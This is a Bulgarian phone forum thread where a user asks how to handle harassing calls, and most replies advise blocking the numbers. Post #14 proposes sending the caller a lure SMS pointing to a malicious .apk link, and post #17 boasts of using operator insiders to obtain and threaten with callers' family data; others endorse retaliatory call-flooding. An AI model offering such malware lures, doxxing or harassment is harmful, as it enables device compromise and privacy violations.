Оценете темата:
  • 0 гласа - средно 0
  • 1
  • 2
  • 3
  • 4
  • 5

Телефонен тормоз
#1

Извинявам се ако темата е в неподходящия раздел.
От известно време всеки ден получавам обаждания от 2 номера. Единият е 0875322604- постоянно търсят лице с друго име. Казах, че имат грешка, но те си настояваха...(при въпроса ми- Кой се обажда? Казаха мтел...)
Другия номер е 0875322600- Вдигам и на момента ми затварят. При последвало обаждане от моя страна пак ми затварят.

Ако може някой да ме насочи къде да подам оплакване (полиция, мтел(ако изобщо са те). Да знам, че най лесно е да ги блокирам тези номера. Но все пак искам да разбера кой и защо ме търси.
Цитирай
Аксесоари
#2

по-добре ги блокирай.
Ако в случая се докаже престъпление, то едва ли ще е тежко и според разпоредбите на ЗЕС, полицията няма да има право да иска информация от операторите за собствеността на тези номера. С една дума, пак няма да разбереш.

Другият вариант е, с твои приятели да напрюавите една офанзива - да се обаждате на тези телелфони и да питате на кого са.

☜ПаднаЛ АнгеЛ☞
ЕСъМъ  за светъл живот. 
Цитирай
#3

Блокирай ги. Не се занимавай с оператори , полиция и т.н.,за такова нещо никой няма да ти обърне внимание.
Цитирай
#4

Блокираш и толкова. Не си трупай излишни нерви...

Внимавам какво си пожелавам, защото може да ми се случи!!!
Цитирай
#5

Също подкрепям опцията за блокиране. Страхотна се справя с досадници.

---------------------------------------------------
Ръждата никога не спи,явно е работохолик.
Пай сее ...
Цитирай
#6

И аз съм за блокиране, навремето ме тормозеше една девойка с разбито сърце, а аз бях вече сериозно обвързан. Получавах смс, звънене на домашния, на мобилния, писма в пощата(във входа) и т.н. въпреки че знаех коя е, дадох всичките й данни в полицията и нищо не направиха, а звънеше през ноща в 1-2-3-4 пияна...


Sent from my iPhone using Tapatalk
Цитирай
#7

Със сигурност не са Мтел. Никога няма да използват номера с 087...


Sent from my LG-H815 using Tapatalk
Цитирай
#8

На мен така ми звънеше един номер. Раздадох го на всички колеги се разбрахме да звънят кой и когато се сети и да търсят ... не помня тоно, ама май кисел чесън. След 3-4 дни (хората се бяха попрестарали, звънели 1-2 часа посред нощ от дискотека, от кръчми, бе денонощно) ми звънна едно момиче от тоя номер, извинява ми се половин час, кле се, че няма повече и така. Спря!

Google Pixel 4 XL + Amazfit Bip
Историята ни учи, че нищо не научаваме от историята. ( Георг Хегел )
Цитирай
#9

И на мен ми се случи да си играят некви *******. Записах няколко разговора, казах им го, блокирах номерата и започнах да звъня през пет минути, час, два(когато се сетя) постоянно и на двата номера, спрях някъде към 11-12 вечерта. И явно се усетиха и никога повече не ми звъннаха. Защото бях им подготвил яко изненади ако бяха продължили. Такива неща не се правят от личен телефон, нито от на някой твой познат. Ама може да са искали да се забавляват. Лошото е че не знаят на кой ще попаднат при следващите такива бъзици Smile
Цитирай
#10

На мен така ми звъняха преди от скрит номер и се сещат ей така по никое време в 0 часа или 2:30 сутринта. Дори единия път успях да вдигна, но отсреща само мълчи и затваря. Накрая си пуснах бяла листа (всичко в указателя може да се свърже с мен, а на непознатите/скритите им дава заето). Така след няколко месеца като видяха, че не могат да ме безпокоят повече тотално се отказа, който/която и да е бил/а.

Apple iPhone 14 Pro Max (256GB) Space Black
Apple AirPods Pro v2 (2023)
Apple Watch Nike S6 GPS 44мм
Цитирай
#11

Щеше да е хубаво, ако оператора предлага опция, даден номер като ти звънне и ти вдигнеш, да го таксува импулсно!...вдигаш и го оставяш... Wink
После, ще му се реве Big Grin

Внимавам какво си пожелавам, защото може да ми се случи!!!
Цитирай
#12

(2017-01-06, 18:33:51)degman написа:  И на мен ми се случи да си играят некви *******. Записах няколко разговора, казах им го, блокирах номерата и започнах да звъня през пет минути, час, два(когато се сетя) постоянно и на двата номера, спрях някъде към 11-12 вечерта. И явно се усетиха и никога повече не ми звъннаха. Защото бях им подготвил яко изненади ако бяха продължили. Такива неща не се правят от личен телефон, нито от на някой твой познат. Ама може да са искали да се забавляват. Лошото е че не знаят на кой ще попаднат при следващите такива бъзици Smile
Извинявам се за офтопика.
Какви изненади и какво може да се предприеме,когато номера не е скрит? Нещо законно или по втория начин?

---------------------------------------------------
Ръждата никога не спи,явно е работохолик.
Пай сее ...
Цитирай
#13

Нямаше да ги търся ако това имаш предвид, не съм от тоя тип хора. Просто щяха да получат от същото в интересни часове и нямаше да е за един ден. Може би месеци да им дойде акъла. Поне да усетят лично забавлението което предлагат на напълно непознати за тях хора. Все пак ги бях записал, след няколко месеца изтрих записите, мисля че няма да ми потрябват Wink

Sent from my SM-G935F
Цитирай
#14

Детски работи, бъдете по агресивни. Аз много мразя да бъда тормозен от някой по телефона. Затова, при полужение че му знаете номера, ами пратете му съобщение Smile
Ето това трябва да направите:
You have received a multimedia message from +[country code] [sender number] Follow the link http:www.mmsforyou [.] Net /mms.apk to view the message.”

Да видим дали ще звънне пак Smile

Samsung Galaxy S10+ Green
Цитирай
#15

If You Receive This Text Message, It Can Destroy Your Android Phone

Взе да става страшно .
Ще пробвам да видим какво ще стане Smile

P.S.

Поне на моят телефон нищо не стана

Wink

Samsung Galaxy Z Fold 3 12/256

Samsung Galaxy Z Fold 4 12/512

Samsung Galaxy S23 Ultra Phantom Black 12/512





Цитирай
#16

Блокаж и край.
Сега си разгледах Block списъка, имам към 300 номера блокираниSmile

Galaxy Note 10 plus 
Galaxy S21 Ultra
Galaxy S23 Ultra
Galaxy S24 Ultra
Цитирай
#17

И аз съм имал подобен "тормоз" от някакви келеши, които си правеха шега, но не знаеха, че имам приятели в операторите. След кратка проверка започнах аз да ги тормозя, после малко им нахвърлих данните на мама, тате, ЕГН, адрес и т.н. и ме молиха да не кажа на родители им. Извиниха ми се, обещаха ми повече да не правили така и това беше.

Най-лесният начин е да ги добавиш в блок листа и това е. Другият вариант ги слагаш на Auto-answer и просто заебаваш телефона някъде да ги набутваш Wink

Alienware R2 15 2015 - i7-6700HQ, 16GB 2133MHz, GTX 970M 4GB, 512 GB m.2 SSD/1TB HDD  ;  Samsung Galaxy Note 10.1 2014 Edition
Цитирай




Потребители разглеждащи темата: 1 гост(и)